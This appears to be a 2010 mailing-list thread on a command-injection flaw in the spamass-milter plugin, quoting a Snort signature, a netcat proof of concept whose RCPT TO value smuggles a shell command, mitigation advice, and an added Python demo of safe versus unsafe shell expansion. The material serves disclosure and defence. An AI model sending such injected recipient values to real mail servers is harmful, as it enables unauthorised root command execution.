On Mon, 2010-03-08 at 20:16 +0000, Ned Slider wrote:
> Brian wrote:
> > On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
> >> just a heads up:  I don't know if there is a problem with SA milter, but 
> >> there is a snort signature for it now.
> >>
> >>
> >> -------- Original Message --------
> >> Subject:   [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote 
> >> Arbitrary Command Injection Attempt
> >> Date:      Mon, 8 Mar 2010 13:03:52 +0000
> >> From:      Kevin Ross <kevros...@googlemail.com>
> >> To:        emerging-s...@emergingthreats.net 
> >> <emerging-s...@emergingthreats.net>, Matt Jonkman <jonk...@jonkmans.com>
> >>
> >>
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible 
> >> SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; 
> >> flow:established,to_server; content:"to|3A|"; nocase; 
> >> content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; 
> >> reference:url,www.securityfocus.com/bid/38578; 
> >> reference:url,seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)
> >>
> >> Kev
> >>
> > 
> > The key is this:
> > 
> > "If spamass-milter is run with the expand flag (-x option) it runs a
> > popen() including the attacker supplied 
> > recipient (RCPT TO)."
> > 
> > PoC is:
> > 
> > $ nc localhost 25
> > 220 ownthabox ESMTP Postfix (Ubuntu)
> > mail from: me () me com
> > 250 2.1.0 Ok
> > rcpt to: root+:"|touch /tmp/foo"
> > 250 2.1.5 Ok
> > 
> > $ ls -la /tmp/foo
> > -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
> > 
> > 
> 
> Easily mitigated: you shouldn't be accepting mail to non-FQDN addresses.
> 
> mail from: n...@example.com
> 250 2.1.0 Ok
> rcpt to: root+:"|touch /tmp/foo"
> 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need 
> fully-qualified address
> quit
> 221 2.0.0 Bye
> Connection closed by foreign host.
> 
That's a Microsoft kind of answer, if you don't mind me saying. Correct
me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a
bolt-on afterthought for Postfix ;-)

It is easily mitigated by *not* running it with '-x' {Happy then
**WITHOUT** Postfix}
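
The mechanics behind the PoC and the two mitigations discussed in the thread, as an added example (not code from the thread, nor spamass-milter's own code). It assumes the vulnerable expansion wraps the untrusted RCPT TO value in double quotes inside a command line and hands that line to the shell, which is what popen(3) does; the leading `"` in `root+:"|...` then closes the quoting and `|` starts a pipeline. The stand-in command just echoes the recipient back, and the PoC's `touch /tmp/foo` is replaced by a harmless marker so the demo leaves nothing behind. The `501 5.1.3` reply for a bad local part is this example's choice; only the `504 5.5.2` text comes from the thread.

```python
"""Constructed demo of the RCPT TO -> popen() injection class from the thread."""
import re
import subprocess

# Same shape as the PoC's root+:"|touch /tmp/foo", with touch swapped for a
# marker echo (constructed payload, harmless).
POC_SHAPE = 'root+:"|echo INJECTED"'


def expand_vulnerable(recipient: str) -> str:
    """popen()-style: the recipient is spliced into a shell command line.

    Assumed vulnerable pattern (not spamass-milter's actual code): the
    recipient is wrapped in double quotes and the whole string is parsed by sh.
    """
    cmd = "printf '%s\\n' \"" + recipient + "\""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def expand_safe(recipient: str) -> str:
    """Same job, but the recipient travels as argv data ($1), never as syntax."""
    argv = ["/bin/sh", "-c", "printf '%s\\n' \"$1\"", "sh", recipient]
    return subprocess.run(argv, capture_output=True, text=True).stdout


# Postfix-style "need fully-qualified address" check from the thread, plus a
# local-part whitelist.  The FQDN check alone stops the PoC only because the
# PoC carries no domain; the whitelist is what rejects the metacharacters.
_DOMAIN = re.compile(r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?\.)+[A-Za-z]{2,}$")
_LOCAL = re.compile(r"^[A-Za-z0-9._+=-]+$")


def is_fqdn_recipient(addr: str) -> bool:
    local, sep, domain = addr.rpartition("@")
    return bool(sep) and bool(local) and _DOMAIN.match(domain) is not None


def local_part_is_safe(addr: str) -> bool:
    local = addr.rpartition("@")[0] if "@" in addr else addr
    return _LOCAL.match(local) is not None


def check_recipient(addr: str) -> str:
    """SMTP-style verdict for a RCPT TO value."""
    if not is_fqdn_recipient(addr):
        return "504 5.5.2 <%s>: Recipient address rejected: need fully-qualified address" % addr
    if not local_part_is_safe(addr):
        # Hypothetical reply chosen for this example.
        return "501 5.1.3 <%s>: Recipient address rejected: bad local part" % addr
    return "250 2.1.5 Ok"


if __name__ == "__main__":
    for addr in (POC_SHAPE, POC_SHAPE + "@example.com", "root@example.com"):
        print(addr)
        print("  vulnerable:", expand_vulnerable(addr).rstrip())
        print("  safe      :", expand_safe(addr).rstrip())
        print("  verdict   :", check_recipient(addr))
```

Running it shows the vulnerable path printing `INJECTED` instead of the recipient, the argv path printing the recipient verbatim, and the FQDN check letting `root+:"|echo INJECTED"@example.com` through to the expander; only the local-part whitelist (or not running the expansion at all, i.e. dropping `-x`) stops that variant.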
